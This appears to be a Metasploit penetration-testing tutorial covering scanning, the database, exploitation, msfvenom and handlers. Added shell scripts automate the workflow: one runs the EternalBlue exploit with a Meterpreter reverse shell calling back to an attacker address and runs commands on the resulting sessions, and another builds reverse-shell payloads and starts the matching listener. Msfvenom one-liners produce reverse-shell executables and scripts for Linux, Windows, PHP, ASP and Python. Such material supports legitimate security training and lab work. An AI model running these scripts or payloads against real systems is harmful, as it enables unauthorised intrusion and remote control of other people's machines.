
Metasploit Exploitation

Introduction to Metasploit

  • Purpose: Metasploit is a powerful penetration testing framework that provides a comprehensive set of tools for vulnerability scanning, exploitation, and post-exploitation. It streamlines the process of identifying and exploiting security weaknesses in various systems and applications.
  • Features:
    • Scanning Modules: A wide range of modules for scanning target systems and networks to identify open ports, services, and vulnerabilities. These modules cover various protocols and services, including TCP, UDP, SMB, and more.
    • Database: A centralized database for storing and managing information about your targets, services, vulnerabilities, and scan results. This facilitates efficient organization and tracking of penetration testing activities, especially in larger engagements.
    • Exploit Modules: A vast collection of exploit modules that target known vulnerabilities in various operating systems, applications, and devices. These modules automate the process of exploiting vulnerabilities to gain access to target systems.
    • msfvenom: A versatile tool for generating payloads in various formats (e.g., executables, scripts, shellcode) for different platforms (e.g., Windows, Linux, macOS). These payloads can be used to establish connections with compromised systems.
    • Meterpreter: An advanced payload that provides a powerful and interactive shell on compromised systems. Meterpreter offers a wide range of post-exploitation capabilities, including file system navigation, process manipulation, privilege escalation, and pivoting.

Port Scanning

  • Modules: Metasploit ships several port scanning modules; list them with search portscan. Commonly used ones include:
    • auxiliary/scanner/portscan/tcp: Performs a TCP connect scan. It completes the three-way handshake, so it needs no special privileges but is logged by the target.
    • auxiliary/scanner/portscan/syn: Conducts a TCP SYN (half-open) scan. It sends raw packets, so msfconsole must run as root.
    • auxiliary/scanner/discovery/udp_sweep: Probes for common UDP services (note that it lives under discovery, not portscan).
  • Options: Port scanning modules typically have the following options:
    • CONCURRENCY: Number of ports probed in parallel on each host (the TCP scanner defaults to 10). Raising it speeds up scans but produces burstier traffic that is easier to notice.
    • PORTS: Ports to scan, as a list or range such as 1-1024 or 22,80,443-445. Metasploit scans exactly the ports you list (the TCP scanner defaults to 1-10000); there is no equivalent of Nmap's default "top 1000 ports" selection.
    • RHOSTS: Target host(s): a single IP, a range (10.10.10.1-20), a CIDR block, or file:/path/to/hosts.txt.
    • THREADS: Number of hosts scanned concurrently. Higher thread counts generally result in faster scans.
  • Nmap Integration: msfconsole passes commands it does not recognise to the underlying shell, so you can run nmap directly from the console with its usual syntax. Use db_nmap instead when you want the results stored in the database.
  • UDP Scanning: The auxiliary/scanner/discovery/udp_sweep module probes for common UDP services such as DNS, NTP, and NetBIOS. UDP has no handshake, so a port that never answers may be open, filtered, or may simply have dropped the probe; UDP scans are therefore slower and less conclusive than TCP scans.
  • SMB Scanning: Metasploit provides modules for enumerating SMB shares (auxiliary/scanner/smb/smb_enumshares) and identifying the SMB version and host operating system (auxiliary/scanner/smb/smb_version). These are particularly useful in corporate environments where SMB is prevalent.
  • NetBIOS Scanning: auxiliary/scanner/netbios/nbname queries NetBIOS names and can reveal hostnames, workgroup or domain membership, and the roles a system advertises (e.g., file server, domain controller).

Metasploit Database

  • Purpose: The Metasploit database serves as a central repository for storing and managing data related to your penetration testing activities. This includes information about target hosts, services, vulnerabilities, and scan results.
  • Starting the Database:
    • Ensure the PostgreSQL service is running: systemctl start postgresql
    • Initialize the Metasploit database: msfdb init. This creates the database, its schema, and the user account msfconsole connects with; it only needs to be run once.
  • Checking Database Status: The db_status command displays the connection status of the Metasploit database.
  • Workspaces: Workspaces allow you to organize your projects and targets within the database. You can create separate workspaces for different clients, engagements, or teams.
    • workspace: Lists available workspaces.
    • workspace -a [name]: Creates a new workspace.
    • workspace -d [name]: Deletes a workspace.
    • workspace [name]: Switches to a different workspace.
  • Database Commands: The help command within msfconsole lists the database backend commands, including:
    • db_nmap: Executes an Nmap scan (same arguments as nmap) and automatically stores the discovered hosts and services in the current workspace.
    • hosts: Lists all hosts stored in the database.
    • services: Lists all services identified on target hosts; services -p 445 filters by port.
    • hosts -R: Sets the RHOSTS option from the hosts in the database (services -R does the same from a filtered service list), so a module can be run against everything found so far without retyping addresses.
    • services -S [string]: Searches the stored services for a string, for example a product or version name.

Vulnerability Scanning

  • Modules: Metasploit offers a variety of vulnerability scanning modules that target specific vulnerabilities or classes of vulnerabilities.
    • Example: auxiliary/scanner/smb/smb_ms17_010: Checks for the MS17-010 vulnerability (EternalBlue) in Windows systems.
  • Searching for Modules: Use the search command to find relevant modules based on keywords (e.g., search vnc to find VNC-related modules).
  • Module Information: The info command provides detailed information about a module, including its description, options, and references.
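The recon steps from the Port Scanning, Metasploit Database and Vulnerability Scanning sections above, chained into one msfconsole resource script and launched from the shell. This is an added example, not code from the page or from the Metasploit project; the workspace name acme-internal, the target range 10.10.10.0/24, and the MSF_RUN=1 switch that actually starts msfconsole are assumptions.

```shell
#!/bin/sh
# Added example: database-driven recon as a msfconsole resource script.
# Assumed values: workspace "acme-internal", targets 10.10.10.0/24 and the
# MSF_RUN=1 switch that launches msfconsole (everything else is inspectable
# without Metasploit installed).

# Write the resource script. Each line is exactly what you would type at the
# msf prompt. "services -p 445 -R" copies every host with SMB open into
# RHOSTS before the SMB modules run, so nothing is retyped by hand.
write_recon_rc() {
  rc=$1; workspace=$2; targets=$3
  cat > "$rc" <<EOF
db_status
workspace -a $workspace
db_nmap -sV -p 1-10000 --open $targets
hosts
services -p 445 -R
use auxiliary/scanner/smb/smb_version
set THREADS 10
run
use auxiliary/scanner/smb/smb_ms17_010
run
vulns
EOF
}

# Sanity check before launching: every "use" must be followed by a "run",
# otherwise the module is selected but never executed.
rc_is_balanced() {
  uses=$(grep -c '^use ' "$1")
  runs=$(grep -c '^run$' "$1")
  [ "$uses" -eq "$runs" ]
}

run_recon() {
  rc=${TMPDIR:-/tmp}/recon.rc
  write_recon_rc "$rc" "${WORKSPACE:-acme-internal}" "${TARGETS:-10.10.10.0/24}"
  rc_is_balanced "$rc" || { echo "resource script has a use without a run" >&2; return 1; }
  # -q suppresses the banner, -r loads and executes the resource script.
  # The database must have been initialised once with "msfdb init".
  msfconsole -q -r "$rc"
}

if [ "${MSF_RUN:-0}" = 1 ]; then
  run_recon
fi
```

Run it with MSF_RUN=1 sh recon.sh on a box where msfdb init has already been done. If no host has 445 open, services -R leaves RHOSTS unset and the two SMB modules will report that RHOSTS is missing; msfconsole keeps executing the remaining lines. The vulns line at the end shows what smb_ms17_010 recorded in the database, which is the hand-off point to the exploitation section.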

Exploitation

  • Exploit Modules: Metasploit's core strength lies in its vast collection of exploit modules. These modules automate the process of exploiting known vulnerabilities to gain access to target systems.
  • Payloads: Each exploit module has a set of compatible payloads. Payloads are the code that will be executed on the target system upon successful exploitation.
    • show payloads: Lists the available payloads for the selected exploit.
    • set payload [name or number]: Selects the desired payload, either by its full name or by its index in the show payloads listing.
  • Setting Options: Exploit modules have various options that need to be configured before execution.
    • show options: Displays the available options for the selected exploit and payload.
    • set [option] [value]: Sets the value of an option (e.g., set RHOSTS 192.168.1.100).
  • Running Exploits: The exploit command (or run) executes the selected exploit module with the configured options. Run check first when the module supports it to confirm the target is vulnerable without exploiting it; exploit -z runs the exploit without dropping you into the new session, and exploit -j runs it as a background job.
  • Session Management:
    • CTRL+Z: Backgrounds the current session, allowing you to interact with other sessions or perform other tasks.
    • CTRL+C: Aborts the current session.
    • sessions: Lists all active sessions.
    • sessions -i [id]: Interacts with a specific session.
    • sessions -h: Displays the help menu for session management commands.
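The exploitation procedure above (select module, set payload and options, check, exploit, then manage sessions) as a resource script, again driven from the shell. This is an added example and not code from the page or from Metasploit; it uses the EternalBlue exploit module as the follow-up to the MS17-010 scanner mentioned earlier, and the target 10.10.10.40, attacker address 10.10.14.2:4444 and MSF_RUN=1 switch are assumptions.

```shell
#!/bin/sh
# Added example: exploitation and session handling as a resource script.
# Assumed values: target 10.10.10.40, attacker 10.10.14.2:4444, the
# exploit/payload pair, and MSF_RUN=1 as the switch that launches msfconsole.

# "check" asks the module to confirm the vulnerability without exploiting it.
# "exploit -z" launches the exploit but does not drop into the session, so the
# script keeps control and can list and query sessions afterwards.
write_exploit_rc() {
  rc=$1; target=$2; lhost=$3; lport=$4
  cat > "$rc" <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $target
set payload windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
show options
check
exploit -z
sessions -l
sessions -C sysinfo
EOF
}

# Refuse to write a script whose LHOST is a loopback address: the target
# would try to call back to itself and the exploit would appear to succeed
# with no session ever arriving.
lhost_is_reachable() {
  case $1 in
    127.*|0.0.0.0|localhost) return 1 ;;
    *) return 0 ;;
  esac
}

run_exploit() {
  rc=${TMPDIR:-/tmp}/exploit.rc
  lhost=${LHOST:-10.10.14.2}
  lhost_is_reachable "$lhost" || { echo "LHOST must be an address the target can reach" >&2; return 1; }
  write_exploit_rc "$rc" "${RHOSTS:-10.10.10.40}" "$lhost" "${LPORT:-4444}"
  msfconsole -q -r "$rc"
}

if [ "${MSF_RUN:-0}" = 1 ]; then
  run_exploit
fi
```

Without -j the exploit command blocks until a session arrives or the attempt fails, so by the time sessions -l runs the session (if any) is already listed; sessions -C sysinfo then runs a Meterpreter command on every open session. In a VPN lab, LHOST must be the tunnel interface address (tun0), not the address of your LAN interface.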

Msfvenom

  • Purpose: msfvenom is a command-line tool used to generate payloads in various formats for different platforms. These payloads can be used to establish connections with target systems, often as part of an exploitation process.
  • Listing Payloads: The msfvenom -l payloads command displays a list of all available payloads within the Metasploit framework.
  • Output Formats: msfvenom --list formats shows the supported output formats for payloads, including:
    • raw: Raw payload (shellcode).
    • exe: Windows executable.
    • elf: Linux executable.
    • php: PHP script.
    • asp: ASP script.
    • And many more.
  • Encoders: Encoders transform the payload bytes. Their original purpose is to avoid characters an exploit cannot deliver (bad characters such as null bytes, set with -b) and to change the payload's byte pattern; against current antivirus they rarely achieve evasion on their own, because the decoder stubs themselves are well known.
    • -e [encoder]: Specifies the encoder to use (e.g., -e php/base64 to Base64-encode a PHP payload). List the available encoders with msfvenom -l encoders.
  • Example (PHP):

    msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 LPORT=4444 -f raw -e php/base64 > payload.php

    This command generates a PHP Meterpreter payload, encodes it with Base64, and saves it to payload.php.

Handlers

  • Purpose: Handlers listen for the incoming connection from a payload (a reverse shell or a Meterpreter callback) and turn it into a session. For staged payloads the handler also serves the second stage over that connection, which is why a plain netcat listener cannot catch them.
  • Module: The exploit/multi/handler module is a generic handler that can be configured for any payload.
  • Setting Options:
    • set payload [payload]: The payload the handler expects. It must match the payload given to msfvenom exactly (e.g., set payload php/meterpreter/reverse_tcp for the PHP example above, or set payload php/reverse_php for a plain PHP reverse shell); a mismatch typically shows up as a connection that opens and immediately dies.
    • set LHOST [ip]: Sets the IP address of your attacking machine where the handler will listen.
    • set LPORT [port]: Sets the port number where the handler will listen; it must match the LPORT compiled into the payload.
  • Running the Handler: run (or exploit) starts the handler. exploit -j runs it as a background job so the console stays usable, and set ExitOnSession false keeps it listening after the first callback instead of shutting down.
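The msfvenom and handler steps above as one shell script that builds both commands from the same payload name, so the handler can never be configured for a different payload than the one generated. It also tells staged payloads from stageless ones, since only a Metasploit handler can serve the stage. This is an added example, not code from the page or from Metasploit; the attacker address 10.10.14.2:4444, the output file names and the MSF_RUN=1 switch are assumptions.

```shell
#!/bin/sh
# Added example: generate a payload and start the matching handler.
# Assumed values: attacker address 10.10.14.2:4444, output file names and
# MSF_RUN=1 as the switch that actually runs msfvenom and msfconsole.

# Staged payloads are named stage/stager (windows/meterpreter/reverse_tcp);
# stageless ones join the two with an underscore (windows/meterpreter_reverse_tcp)
# or are single command shells (cmd/unix/reverse_python). A staged payload
# connects back and then asks for its stage, which only multi/handler sends.
is_staged() {
  case $1 in
    */meterpreter/*|*/shell/*|*/vncinject/*|*/dllinject/*|*/powershell/*) return 0 ;;
    *) return 1 ;;
  esac
}

# The msfvenom invocation; -o writes the file, same as "> file".
venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s' "$1" "$2" "$3" "$4" "$5"
}

# The one-shot msfconsole command for a handler that matches the payload.
# ExitOnSession false keeps listening after the first callback and
# "exploit -j" backgrounds the handler so the console stays usable.
handler_cmd() {
  printf 'use exploit/multi/handler; set payload %s; set LHOST %s; set LPORT %s; set ExitOnSession false; exploit -j' "$1" "$2" "$3"
}

# Pick the output format that fits the payload's platform.
format_for() {
  case $1 in
    windows/*) echo exe ;;
    linux/*)   echo elf ;;
    *)         echo raw ;;
  esac
}

PAYLOAD=${PAYLOAD:-windows/meterpreter/reverse_tcp}
LHOST=${LHOST:-10.10.14.2}
LPORT=${LPORT:-4444}

if [ "${MSF_RUN:-0}" = 1 ]; then
  fmt=$(format_for "$PAYLOAD")
  cmd=$(venom_cmd "$PAYLOAD" "$LHOST" "$LPORT" "$fmt" "rev_shell.$fmt")
  echo "+ $cmd"; eval "$cmd"
  if is_staged "$PAYLOAD"; then
    echo "staged payload: catch it with multi/handler, a plain nc listener will not work"
  fi
  msfconsole -q -x "$(handler_cmd "$PAYLOAD" "$LHOST" "$LPORT")"
fi
```

Usage: PAYLOAD=php/meterpreter/reverse_tcp MSF_RUN=1 sh handler.sh generates rev_shell.raw and leaves msfconsole waiting with a handler for exactly that payload; upload and trigger the file on the target and the session appears in sessions -l. The is_staged classification is a naming heuristic for the common payload families, not a lookup against Metasploit's module metadata.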

Other Msfvenom Payloads

  • Linux (ELF):

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=... LPORT=... -f elf > rev_shell.elf

    Generates a Linux executable payload in ELF format (make it executable with chmod +x before running it on the target).
  • Windows (EXE):

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=... LPORT=... -f exe > rev_shell.exe

    Creates a Windows executable payload.
  • PHP:

    msfvenom -p php/meterpreter_reverse_tcp LHOST=... LPORT=... -f raw > rev_shell.php

    Generates a stageless PHP Meterpreter payload. Note the underscore: php/meterpreter_reverse_tcp is the stageless variant and php/meterpreter/reverse_tcp the staged one; the handler's payload must match whichever you chose.
  • ASP:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=... LPORT=... -f asp > rev_shell.asp

    Creates an ASP page that launches a Windows Meterpreter payload.
  • Python:

    msfvenom -p cmd/unix/reverse_python LHOST=... LPORT=... -f raw > rev_shell.py

    Generates a one-line reverse shell command that invokes python. It is meant to be pasted into a shell or a command-injection point rather than executed as a .py file.